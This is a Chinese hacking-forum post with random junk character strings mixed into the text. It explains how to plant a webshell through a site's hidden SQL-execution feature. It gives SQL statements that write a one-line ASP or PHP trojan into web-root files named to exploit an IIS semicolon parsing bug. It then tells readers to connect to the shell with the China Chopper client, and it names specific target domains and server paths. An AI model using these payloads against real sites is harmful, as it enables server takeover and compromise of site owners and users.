好不容易进了后台,发现啥上传啊。备份啊多木有。% L- q6 r4 x, R2 C9 g8 @3 l
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
9 E. u9 f; ~4 [3 M3 ]文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
. \7 j9 P5 s, N! L然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:; V- e9 K& T n5 L' O, q
1.create table cmd (a varchar(50))* D9 D, N; j6 P5 [: N
2.insert into cmd (a) values (‘‘)
! ?9 H8 m" \; t4 O3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
$ V, i$ ~ _/ K8 S; a; h(把表cmd的内容导出为物理路径的一个EXCEL文件)
9 `3 |9 l; F7 U# n0 O* u4.drop table cmd# u4 \/ G! c' h# U" ?
利用IIS的BUG成功拿到了WEBSHELL。
* P: ?4 p0 Q+ P( J$ ?
& _5 | {( G$ P+ C. C直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话& L5 V0 v- g" A/ |2 \; v
& U: |/ @! a0 n( R SQL语句意思解释:
) B" Z, F' Z( w 第一句. l# F# V+ W. ?: M" Q- D. O0 k2 z
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
$ O( S1 G1 B2 L# f0 a4 i6 X1 r) Y0 P0 b$ i
第二句2 ^- v) B; Q% r% F% D* u
在表cmd的a字段插入一句话木马6 A, w* T, P' D# g" `# D
第三句
( m& \- k7 J! \1 W, J 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
/ O) g! f0 s m, B- l. @
a2 |. Y, X/ Q4 O( `8 ? 第四句
) z3 h% Y |3 T" U; p& H4 m 删除建立的cmd表7 p w: e' b- y8 B; Q
4 ^8 ~# o( _2 }+ U2 V 以下内容为测试:& G" F. B3 o8 k3 w( h5 i- j
Access利用后台SQL执行命令功能导出WebShell:
/ d: W9 g8 k7 S* ^4 X( F' P 这个更简单:2 x+ L2 r* p% y/ }
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol], Y# N2 ^ w6 D i
或者
; T2 K9 d$ b- o. t) z6 ^# V5 b$ P0 g [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]1 w) Q& t8 R8 E
* W8 _4 M g9 j
后台有执行SQL语句功能(vote为已知表段)
. I7 U: @' B4 A# P! r 希望对大家有所帮助拿shell的又一个思路
8 ^0 ?: |, F! b* a( R |
发表于 2012-9-13 17:53:58
收藏
支持
反对